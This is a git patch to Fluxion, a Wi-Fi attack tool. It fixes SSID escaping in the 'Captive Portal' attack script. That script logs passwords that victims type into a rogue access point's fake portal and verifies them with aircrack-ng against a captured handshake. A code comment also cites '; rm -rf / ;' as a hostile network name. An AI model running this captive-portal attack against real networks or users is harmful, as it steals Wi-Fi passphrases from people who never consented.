From e3b9b720098f9a5adc8a5cb3f4da077192a15b34 Mon Sep 17 00:00:00 2001
From: Matias Barcenas <MPX.4132@Gmail.com>
Date: Fri, 22 Dec 2017 01:40:06 -0600
Subject: [PATCH] Fixed multiple bugs related to character escaping.

Fixed a bug with the authenticator where the wrong SSID was displayed.
Fixed a bug with the authenticator's network log, same as above.
Fixed a bug with the hash path prompt, same as above.
Added another character as candidate for SSID substitution (backslash).
---
 attacks/Captive Portal/attack.sh          | 15 ++++++++-------
 attacks/Handshake Snooper/handshakes/test |  1 -
 fluxion.sh                                |  8 +++-----
 3 files changed, 11 insertions(+), 13 deletions(-)
 delete mode 100644 attacks/Handshake Snooper/handshakes/test

diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh
index a0ccb7e..8a13c88 100755
--- a/attacks/Captive Portal/attack.sh	
+++ b/attacks/Captive Portal/attack.sh	
@@ -641,7 +641,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
 		fi
 
 		# Save any new password attempt.
-		cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC.log\"
+		cat \"$FLUXIONWorkspacePath/pwdattempt.txt\" >> \"$CaptivePortalPassLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"
 
 		# Clear logged password attempt.
 		echo -n > \"$FLUXIONWorkspacePath/pwdattempt.txt\"
@@ -652,7 +652,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
 		echo "
 	if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
 		# Check if we've got the correct password by looking for anything other than \"Passphrase not in\".
-		if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then
+		if ! aircrack-ng -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" | grep -qi \"Passphrase not in\"; then
             echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
 
 			sleep 1
@@ -665,12 +665,13 @@ while [ \$AuthenticatorState = \"running\" ]; do
 	fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
 	fi
 
+	local staticSSID=$(printf "%q" "$APTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
 	echo "
 	DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host))
 
 	echo
 	echo -e \"  ACCESS POINT:\"
-	echo -e \"    SSID ...........: $CWht$APTargetSSIDEscaped$CClr\"
+	printf  \"    SSID ...........: $CWht%s$CClr\\n\" \"$staticSSID\"
 	echo -e \"    MAC ............: $CYel$APTargetMAC$CClr\"
 	echo -e \"    Channel ........: $CWht$APTargetChannel$CClr\"
 	echo -e \"    Vendor .........: $CGrn${APTargetMaker:-UNKNOWN}$CClr\"
@@ -729,9 +730,9 @@ if [ ! -d \"$CaptivePortalNetLog\" ]; then
 fi
 
 echo \"
-FLUXION $FLUXIONVersion
+FLUXION $FLUXIONVersion.$FLUXIONRevision
 
-SSID: $APTargetSSIDEscaped
+SSID: \\\"$staticSSID\\\"
 BSSID: $APTargetMAC ($APTargetMaker)
 Channel: $APTargetChannel
 Security: $APTargetEncryption
@@ -739,11 +740,11 @@ Time: \$ih\$h:\$im\$m:\$is\$s
 Password: \$(cat $FLUXIONWorkspacePath/candidate.txt)
 Mac: $(captive_portal_get_IP_MAC)
 IP: $(captive_portal_get_client_IP)
-\" >\"$CaptivePortalNetLog/$APTargetSSIDClean-$APTargetMAC.log\"" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
+\" >\"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log\"" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
 
 	if [ $APRogueAuthMode = "hash" ]; then
 		echo "
-aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$APTargetSSIDClean-$APTargetMAC.log"$CClr"\"\
+aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/${APTargetSSIDClean//\"/\\\"}-$APTargetMAC.log"$CClr"\"\
 " >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
 	fi
 
diff --git a/attacks/Handshake Snooper/handshakes/test b/attacks/Handshake Snooper/handshakes/test
deleted file mode 100644
index a9bf588..0000000
--- a/attacks/Handshake Snooper/handshakes/test	
+++ /dev/null
@@ -1 +0,0 @@
-#!/bin/bash
diff --git a/fluxion.sh b/fluxion.sh
index 7070e5f..e56d3b5 100755
--- a/fluxion.sh
+++ b/fluxion.sh
@@ -694,10 +694,8 @@ function fluxion_set_target_ap() {
 	# Notice: Why remove these? Because some smartass might decide to name their
 	# network something like "; rm -rf / ;". If the string isn't sanitized accidentally
 	# shit'll hit the fan and we'll have an extremely distressed person subit an issue.
-	# Removing: ' ', '/', '.', '~'
-	local strippedSSID=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~)+/_/g')
-	APTargetSSIDClean=$(printf "%q" "$strippedSSID") # Escape specials for safety.
-	APTargetSSIDEscaped=$(printf "%q" "$APTargetSSID") # Regular with escaped specials too.
+	# Removing: ' ', '/', '.', '~', '\'
+	APTargetSSIDClean=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g')
 
 	# We'll change a single hex digit from the target AP's MAC address.
 	# This new MAC address will be used as the rogue AP's MAC address.
@@ -833,7 +831,7 @@ function fluxion_set_hash() {
 
 			fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker"
 
-			echo -e  "Path: ${CClr}$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap"
+			printf   "Path: %s\n" "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap"
 			echo -ne "$FLUXIONVLine ${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] "
 
 			read APTargetHashPathConsidered